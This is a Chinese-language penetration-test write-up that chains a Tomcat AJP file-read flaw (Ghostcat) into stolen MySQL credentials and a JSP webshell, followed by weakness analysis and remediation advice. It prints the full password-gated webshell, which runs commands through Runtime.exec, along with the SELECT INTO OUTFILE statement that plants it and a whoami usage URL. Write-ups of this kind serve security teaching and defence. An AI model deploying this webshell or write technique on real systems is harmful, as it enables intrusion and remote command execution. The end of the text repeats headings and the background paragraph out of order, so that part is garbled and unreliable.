未授权访问漏洞利用链实战：从AJP任意文件读取到GetShell<\/h1>

一、漏洞利用背景<\/h2>
本案例记录了一个完整的渗透测试过程，从发现未授权访问漏洞开始，通过AJP任意文件读取漏洞获取数据库凭证，最终实现GetShell的全过程。目标系统为公司内部系统，测试已获得授权。<\/p>

二、漏洞利用详细步骤<\/h2>

2.1 初始信息收集<\/h3>

端口扫描<\/strong>：

使用Nmap扫描发现目标运行Windows Server 2008<\/li>
开放了8009端口(AJP协议)<\/li>
系统较老，可能存在MS17-010(永恒之蓝)等漏洞<\/li> <\/ul> <\/li> <\/ol>
2.2 AJP任意文件读取漏洞利用<\/h3>

漏洞验证<\/strong>：<\/p>

使用AJP任意文件读取POC验证漏洞存在<\/li>
通过漏洞读取服务器上的敏感配置文件<\/li> <\/ul> <\/li>

获取数据库凭证<\/strong>：<\/p>

从配置文件中发现MySQL数据库账户：mysql:password<\/code><\/li> <\/ul> <\/li>
数据库权限检查<\/strong>：<\/p> 登录MySQL数据库<\/li> 检查FILE权限：SELECT * FROM mysql.user WHERE File_priv='Y'<\/code><\/li> 检查secure_file_priv<\/code>设置：SHOW VARIABLES LIKE 'secure_file_priv'<\/code> 必须为空或指定目录才能写入文件<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 2.3 通过数据库写入WebShell<\/h3> 写入WebShell<\/strong>：<\/p> 确认有写入权限后，执行SQL语句写入JSP木马：<\/li> <\/ul> SELECT<\/span> '<%if("pass".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}}%>'<\/span> <\/span><\/span>INTO<\/span> OUTFILE 'D:\/Apache Software Foundation\/Tomcat 6.0\/webapps\/ROOT\/shell.jsp'<\/span>; <\/span><\/span><\/code><\/pre><\/li> WebShell验证<\/strong>：<\/p> 访问\/shell.jsp?pwd=pass&cmd=whoami<\/code><\/li> 确认执行系统命令成功<\/li> <\/ul> <\/li> <\/ol> 2.4 目录爆破补充利用<\/h3> 改进目录爆破<\/strong>：<\/p> 使用dirsearch工具时添加-r<\/code>参数进行递归爆破<\/li> 发现新的文件上传接口<\/li> <\/ul> <\/li> 获取绝对路径<\/strong>：<\/p> 通过上传接口的提交按钮意外获取网站部署绝对路径： d:\Apache Software Foundation\Tomcat 6.0\webapps\ROOT\<\/code><\/li> <\/ul> <\/li> <\/ol> 三、漏洞利用成功确认<\/h2> 通过写入的WebShell执行系统命令<\/li> 确认获得的权限级别很高，无需进一步提权<\/li> <\/ul> 四、系统安全弱点分析<\/h2> 外部可见问题：<\/h3> 信息泄露<\/strong>：<\/p> 报错信息暴露敏感路径<\/li> 系统版本信息暴露<\/li> <\/ul> <\/li> 认证缺陷<\/strong>：<\/p> 缺乏口令强度机制<\/li> 无防爆破机制<\/li> <\/ul> <\/li> 逻辑漏洞<\/strong>：<\/p> 存在越权访问漏洞<\/li> <\/ul> <\/li> <\/ol> 内部安全问题：<\/h3> 权限配置不当<\/strong>：<\/p> 数据库和网站权限过高<\/li> <\/ul> <\/li> 漏洞修复滞后<\/strong>：<\/p> 存在2020年的老漏洞未修复<\/li> <\/ul> <\/li> 防护措施缺失<\/strong>：<\/p> 未部署EDR(终端检测与响应)、HIDS(主机入侵检测系统)等防护工具<\/li> 简单的木马无需免杀即可执行<\/li> <\/ul> <\/li> <\/ol> 五、修复建议<\/h2> AJP协议安全<\/strong>：<\/p> 禁用或限制AJP协议访问<\/li> 更新Tomcat到最新版本修复AJP漏洞<\/li> <\/ul> <\/li> 数据库安全<\/strong>：<\/p> 修改默认数据库密码<\/li> 限制数据库账户权限，移除不必要的FILE权限<\/li> 设置secure_file_priv<\/code>为NULL或严格限制的目录<\/li> <\/ul> <\/li> 系统加固<\/strong>：<\/p> 升级老旧操作系统(Windows Server 2008)<\/li> 及时安装安全补丁，特别是MS17-010等严重漏洞<\/li> <\/ul> <\/li> 应用安全<\/strong>：<\/p> 隐藏敏感错误信息<\/li> 实现严格的权限控制<\/li> 对上传功能进行严格限制和过滤<\/li> <\/ul> <\/li> 安全监控<\/strong>：<\/p> 部署EDR和HIDS等防护工具<\/li> 建立文件完整性监控<\/li> 实施Web应用防火墙(WAF)<\/li> <\/ul> <\/li> 安全开发<\/strong>：<\/p> 修复代码中的逻辑错误<\/li> 实施安全编码规范<\/li> 进行定期的安全代码审计<\/li> <\/ul> <\/li> <\/ol> 六、技术要点总结<\/h2> AJP协议利用<\/strong>：<\/p> AJP(Apache JServ Protocol)是Tomcat与Web服务器通信的协议<\/li> CVE-2020-1938(Ghostcat)等漏洞可导致任意文件读取<\/li> <\/ul> <\/li> 数据库写Shell条件<\/strong>：<\/p> 需要数据库账户有FILE权限<\/li> secure_file_priv<\/code>不能设置为限制写入<\/li> 需要知道网站绝对路径<\/li> <\/ul> <\/li> WebShell设计<\/strong>：<\/p> 示例中使用的是密码保护的JSP WebShell<\/li> 通过参数pwd<\/code>验证，cmd<\/code>执行系统命令<\/li> <\/ul> <\/li> 目录爆破技巧<\/strong>：<\/p> 递归爆破(-r<\/code>参数)可发现深层目录<\/li> 结合其他信息泄露可提高成功率<\/li> <\/ul> <\/li> <\/ol> 本案例展示了如何将多个漏洞串联形成完整的攻击链，强调了纵深防御和安全配置的重要性。<\/p>

未授权访问漏洞利用链实战：从AJP任意文件读取到GetShell<\/h1>

一、漏洞利用背景<\/h2> 本案例记录了一个完整的渗透测试过程，从发现未授权访问漏洞开始，通过AJP任意文件读取漏洞获取数据库凭证，最终实现GetShell的全过程。目标系统为公司内部系统，测试已获得授权。<\/p>

二、漏洞利用详细步骤<\/h2>

四、系统安全弱点分析<\/h2>

一、漏洞利用背景<\/h2>
本案例记录了一个完整的渗透测试过程，从发现未授权访问漏洞开始，通过AJP任意文件读取漏洞获取数据库凭证，最终实现GetShell的全过程。目标系统为公司内部系统，测试已获得授权。<\/p>